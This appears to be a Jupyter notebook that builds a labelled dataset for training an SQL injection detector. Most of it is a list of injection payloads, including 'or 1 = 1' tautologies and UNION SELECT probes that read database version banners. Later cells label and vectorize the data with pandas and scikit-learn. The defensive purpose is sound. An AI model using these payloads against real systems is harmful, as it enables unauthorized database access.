 ' select * from users where id = 1 union select .1_,version (  )  -- 1',
 ' select * from users where id = 1 union select 1`\\`,version (  )  -- 1',
 ' select * from users where id = 1 union select 1a#,banner from v$version where rownum = 1 -- 1',
 ' select * from users where id = 1 union select 1a,banner from v$version where rownum = 1 -- 1',
 ' select * from users where id = 1 union select .1$_,version (  )  -- 1',
 ' select * from users where id = 1 union select 1<@,version (  )  -- 1',
 ' select * from users where id = 1 union select 1<@.,version (  )  -- 1',
 ' select * from users where id = 1 union select 1 $$,version (  )  -- 1',
 ' select * from users where id = 1 union select !<1,version (  )  -- 1',
 ' select * from users where id = 1 union select +!<1,version (  )  -- 1',
 ' select * from users where id = 1 union select +!<@,version (  )  -- 1',
 ' select * from users where id = 1 union select !<@,version (  )  -- 1',
 ' select * from users where id = 1 union select @||1,version (  )  -- 1',
 ' select * from users where id = 1 union select @&&@,version (  )  -- 1',
 ' select * from users where id = 1 union select @ 1$,version (  )  -- 1',
 ' select * from users where id = 1 union select  @ $,version (  )  -- 1',
 ' select * from users where id = 1 union select @ 1a,version (  )  -- 1',
 ' select * from users where id = 1 union select @<@$,version (  )  -- 1',
 ' select * from users where id = 1   union select null,banner from v$version where rownum = 1 -- 1',
 ' select * from users where id = 1 union select @ _,version (  )  -- 1',
 ' select * from users where id = 1 union select @ $_,version (  )  -- 1',
 ' select * from users where id = 1 union select @<@,version (  )  -- 1',
 ' select * from users where id = 1 union select @<@.,version (  )  -- 1',
 ' select * from users where id = 1 union select @ $$,version (  )  -- 1',
 ' select * from users where id = 1 +$ . or 1 = 1 -- 1',
 ' select * from users where id = 1 +$ . union select null,@@VERSION -- 1',
 ' select * from users where id = 1 +$ 1 or 1 = 1 -- 1',
 ' select * from users where id = 1 +$ 1 union select null,@@VERSION -- 1',
 ' select * from users where id = 1 +$+ or 1 = 1 -- 1',
 ' select * from users where id = 1 +  ( $+ )  or 1 = 1 -- 1',
 ' select * from users where id = 1 +  ( $+ )  union select null,@@VERSION -- 1',
 ' select * from users where id = 1 +$+. or 1 = 1 -- 1',
 ' select * from users where id = 1 +$+. union select null,@@VERSION -- 1',
 ' select * from users where id = 1 +$+ union select null,@@VERSION -- 1',
 ' select * from users where id = 1 + $+%\\ or 1 = 1 -- 1',
 ' select * from users where id = 1 + $+%1 or 1 = 1 -- 1',
 ' select * from users where id = 1 + $+%1 union select null,@@VERSION -- 1',
 ' select * from users where id = 1 + $+*\\ union select null,@@VERSION -- 1',
 ' select * from users where id = 1 + $+%$ or 1 = 1 -- 1',
 ' select * from users where id = 1 + $+*$ union select null,@@VERSION -- 1',
 ' select * from users where id = 1 <@ or 1 = 1 -- 1',
 ' select * from users where id = 1 % ( \\ )  or 1 = 1 -- 1',
 ' select * from users where id = 1 * ( \\ )  union select null,@@VERSION -- 1',
 ' select * from users where id = 1 % ( 1 )  or 1 = 1 -- 1',
 ' select * from users where id = 1 * ( 1 )  union select 1,banner from v$version where rownum = 1 -- 1',
 ' select * from users where id = 1 % ( $ )  or 1 = 1 -- 1',
 ' select * from users where id = 1 % ( @ )  or 1 = 1 -- 1',
 ' select * from users where id = 1 <@. or 1 = 1 -- 1',
 ' select * from users where id = 1 <@.. or 1 = 1 -- 1',
 ' select * from users where id = 1<@.. union select 1,version (  )  -- 1',
 ' select * from users where id = 1 <@. union select 1,version (  )  -- 1',
 ' select * from users where id = 1  <@. union select version (  ) ,version (  )  -- 1',
 ' select * from users where id = 1 *\\. union select null,@@VERSION -- 1',
 ' select * from users where id = 1 <@.$ or 1 = 1 -- 1',
 ' select * from users where id = 1 <@.$ union select 1,version (  )  -- 1',
 ' select * from users where id = 1 *1 or 1 = 1 -- 1',
 ' select * from users where id = 1 *1 union select 1,banner from v$version where rownum = 1 -- 1',
 ' select * from users where id = 1 *1 union select null,banner from v$version where rownum = 1 -- 1',
 ' select * from users where id = 1 <1## union select 1,version (  )  -- 1',
 ' select * from users where id = 1 <@1$ or 1 = 1 -- 1',
 ' select * from users where id = 1 <@1$ union select 1,version (  )  -- 1',
 ' select * from users where id = 1 *\\ union select null,@@VERSION -- 1',
 ' select * from users where id = 1 <@$ or 1 = 1 -- 1',
 ' select * from users where id = 1 %$ . or 1 = 1 -- 1',
 ' select * from users where id = 1 *$ . union select null,@@VERSION -- 1',
 ' select * from users where id = 1 %$ 1 or 1 = 1 -- 1',
 ' select * from users where id = 1 %$ 1 union select null,@@VERSION -- 1',
 ' select * from users where id = 1 <@$_ or 1 = 1 -- 1',
 ' select * from users where id = 1 <@$_ union select 1,version (  )  -- 1',
 ' select * from users where id = 1 <@<@ or 1 = 1 -- 1',
 ' select * from users where id = 1 %!<1 or 1 = 1 -- 1',
 ' select * from users where id = 1 | |1 union select 1,banner from v$version where rownum = 1 -- 1',
 ' select * from users where id = 1<@<@ union select 1,version (  )  -- 1',
 ' select * from users where id = 1 <@<@ union select version (  ) ,version (  )  -- 1',
 ' select * from users where id = 1 <@<@ union select null,version (  )  -- 1',
 ' select * from users where id = 1 %!<@ or 1 = 1 -- 1',
 ' select * from users where id = 1 <@&@ union select 1,version (  )  -- 1',
 ' select * from users where id = 1 <@$$ union select 1,version (  )  -- 1',
 ' select * from users where id = 1 &@ or 1 = 1 -- 1',
 " select * from users where id = '1' or ||/1 = 1 union select 1,version (  )  -- 1'",
 " select * from users where id = '1' or  ( \\ )  = 1 union select 1,@@VERSION -- 1'",
 " select * from users where id = '1' or  ( \\. )  = 1 union select 1,@@VERSION -- 1'",
 " select * from users where id = '1' or  ( 1 )  = 1 union select 1,banner from v$version where rownum = 1 -- 1'",
 " select * from users where id = '1' or \\.<\\ or 1 = 1 -- 1'",
 " select * from users where id = '1' or \\.<1 union select 1,@@VERSION -- 1'",
 " select * from users where id = '1' or \\.<\\ union select 1,@@VERSION -- 1'",
 " select * from users where id = '1' or \\.<$ union select 1,@@VERSION -- 1'",
 " select * from users where id = '1' or \\.<  = 1 union select 1,@@VERSION -- 1'",
 " select * from users where id = '1' ||1 union select 1,banner from v$version where rownum = 1 -- 1'",
 " select * from users where id = '1'   or 1 = 1 -- 1'",
 " select * from users where id = '1' or 1^ = 1 union select 1,banner from v$version where rownum = 1 -- 1'",
 " select * from users where id = '1' or $ . = 1 union select 1,@@VERSION -- 1'",
 " select * from users where id = '1' or $ 1 = 1 or 1 = 1 -- 1'",
 " select * from users where id = '1' or $ 1 = 1 union select 1,@@VERSION -- 1'",
 " select * from users where id = '1' or $<\\ or 1 = 1 -- 1'",
 " select * from users where id = '1' or $<\\. union select 1,@@VERSION -- 1'",
 " select * from users where id = '1' or $<\\ union select 1,@@VERSION -- 1'",
 " select * from users where id = '1' or $+<$ union select 1,@@VERSION -- 1'",
 " select * from users where id = '1' or \\<\\. or 1 = 1 -- 1'",
 " select * from users where id = '1' or \\<\\. union select 1,@@VERSION -- 1'",
 " select * from users where id = '1' or \\<1 or 1 = 1 -- 1'",
 " select * from users where id = '1' or !<1 union select 1,version (  )  -- 1'",
 " select * from users where id = '1' or \\<\\ union select 1,@@VERSION -- 1'",
 " select * from users where id = '1' or \\<$ or 1 = 1 -- 1'",
 " select * from users where id = '1' or \\<$ union select 1,@@VERSION -- 1'",
 " select * from users where id = '1' or \\<  = 1 union select 1,@@VERSION -- 1'",
 " select * from users where id = '1' or !<@ or 1 = 1 -- 1'",
 " select * from users where id = '1' or !<@ union select 1,version (  )  -- 1'",
 " select * from users where id = '1' or @ ( 1 )  = 1 union select 1,version (  )  -- 1'",
 " select * from users where id = '1' or @ 1 = 1 union select 1,version (  )  -- 1'",
 " select * from users where id = '1' or @ @1 = 1 union select 1,version (  )  -- 1'",
 ' select * from users where id = 1 or " (  ) " or 1 = 1 -- 1',
 ' select * from users where id = 1 or " ( ," = 1 or 1 = 1 -- 1',
 ' select * from users where id = 1 or " ( ." or 1 = 1 -- 1',
 ' select * from users where id = 1 or " ( 1" or 1 = 1 -- 1',
 's',
 ' select * from users where id = 1 or " ( ;" or 1 = 1 -- 1',
 ' select * from users where id = 1 or " ( ]" or 1 = 1 -- 1',
 ' select * from users where id = 1 or 1#" (  union select 1,version (  )  -- 1',
 ' select * from users where id = 1 or 1#" (  union select version (  ) ,version (  )  -- 1',
 ' select * from users where id = 1 or 1#" (  union select \'a\',version (  )  -- 1',
 ' select * from users where id = 1 or 1#" (  union select null,version (  )  -- 1',
 ' select * from users where id = 1 or " ( #" or 1 = 1 -- 1',
 ' select * from users where id = 1 or " ( [" or 1 = 1 -- 1',
 ' select * from users where id = 1 or " ( _" or 1 = 1 -- 1',
 ' select * from users where id = 1 or @#" (  = 1 or 1 = 1 -- 1',
 ' select * from users where id = 1 or @#" (  = 1 union select 1,version (  )  -- 1',
 ' select * from users where id = 1 or " ( &" or 1 = 1 -- 1',
 ' select * from users where id = 1 or " ( @" or 1 = 1 -- 1',
 ' select * from users where id = 1 or " ( {" or 1 = 1 -- 1',
 ' select * from users where id = 1 or " )  ( " = 1 or 1 = 1 -- 1',
 ' select * from users where id = 1 or " ) ," or 1 = 1 -- 1',
 ' select * from users where id = 1 or " ) ." = 1 or 1 = 1 -- 1',
 ' select * from users where id = 1 or " ) 1" or 1 = 1 -- 1',
 's',
 ' select * from users where id = 1 or " ) ;" or 1 = 1 -- 1',
 ' select * from users where id = 1 or " ) ]" or 1 = 1 -- 1',
 ' select * from users where id = 1 or " ) [" or 1 = 1 -- 1',
 ' select * from users where id = 1 or " ) $" or 1 = 1 -- 1',
 ' select * from users where id = 1 or " ) @" or 1 = 1 -- 1',
 ' select * from users where id = 1 or " ) {" or 1 = 1 -- 1',
 ' select * from users where id = 1 or ", ( " or 1 = 1 -- 1',
 ' select * from users where id = 1 or ", ) " = 1 or 1 = 1 -- 1',
 ' select * from users where id = 1 or ",," = 1 or 1 = 1 -- 1',
 ' select * from users where id = 1 or ",." or 1 = 1 -- 1',
 's',
 ' select * from users where id = 1 or ",;" or 1 = 1 -- 1',
 ' select * from users where id = 1 or ",?" or 1 = 1 -- 1',
 ' select * from users where id = 1 or 1#", union select 1,version (  )  -- 1',
 ' select * from users where id = 1 or 1#", union select version (  ) ,version (  )  -- 1',
 ' select * from users where id = 1 or 1#", union select \'a\',version (  )  -- 1',
 ' select * from users where id = 1 or 1#", union select null,version (  )  -- 1',
 ' select * from users where id = 1 or ",#" or 1 = 1 -- 1',
 ' select * from users where id = 1 or 1#", = 1 or 1 = 1 -- 1',
 ' select * from users where id = 1 or @#", = 1 union select 1,version (  )  -- 1',
 ' select * from users where id = 1 or ",&" or 1 = 1 -- 1',
 ' select * from users where id = 1 or ",{" or 1 = 1 -- 1',
 ' select * from users where id = 1 or ". ( " or 1 = 1 -- 1',
 ' select * from users where id = 1 or ". ) " or 1 = 1 -- 1',
 ' select * from users where id = 1 or ".," or 1 = 1 -- 1',
 ' select * from users where id = 1 or ".." = 1 or 1 = 1 -- 1',
 's',
 ' select * from users where id = 1 or ".;" or 1 = 1 -- 1',
 ' select * from users where id = 1 or ".]" or 1 = 1 -- 1',
 ' select * from users where id = 1 or 1#". union select 1,version (  )  -- 1',
 ' select * from users where id = 1 or 1#". union select version (  ) ,version (  )  -- 1',
 ' select * from users where id = 1 or 1#". union select \'a\',version (  )  -- 1',
 ' select * from users where id = 1 or 1#". union select null,version (  )  -- 1',
 ' select * from users where id = 1 or ".#" or 1 = 1 -- 1',
 ' select * from users where id = 1 or ".[" or 1 = 1 -- 1',
 ' select * from users where id = 1 or "._" or 1 = 1 -- 1',
 ' select * from users where id = 1 or @#". = 1 or 1 = 1 -- 1',

In [68]:
import pandas as pd

In [69]:
# give labels to sql data

values=[]
for i in all_sqli_sentence:
    values.append((i,1))

In [70]:
# give labels to benign data

for i in data:
    values.append((i,0))

In [71]:
len(all_sqli_sentence)+len(data)

4032

In [72]:
len(values)

4032

In [73]:
for i in benign_sentence:
    values.append((i,0))

In [74]:
len(values)

5147

In [75]:
for i in sqli_data:
    values.append((i,1))

In [76]:

len(values)

5437

In [77]:
values[1]

(' select * from users where id = 1 or  ( \\. )  = 1 union select 1,@@VERSION -- 1',
 1)

In [78]:
df=pd.DataFrame(values,columns=['Sentence','Label'])

In [79]:
df.head()

                                            Sentence  Label
0   select * from users where id = 1 or  ( \ )  =...      1
1   select * from users where id = 1 or  ( \. )  ...      1
2   select * from users where id = 1 or  ( \+ )  ...      1
3   select * from users where id = 1 or  ( 1 )  =...      1
4   select * from users where id = 1 or  ( \+ )  ...      1

In [80]:
df.to_csv('sqli.csv', index=False, encoding='utf-16')

In [81]:
df=pd.read_csv('sqli.csv',encoding='utf-16')

In [82]:
# vectorization of data

from sklearn.feature_extraction.text import CountVectorizer
vectorizer = CountVectorizer( min_df=2, max_df=0.7, max_features=4096, stop_words=stopwords.words('english'))
posts = vectorizer.fit_transform(df['Sentence'].values.astype('U')).toarray()

In [83]:
posts.shape

(5437, 4096)

In [84]:
posts.shape=(5437,64,64,1)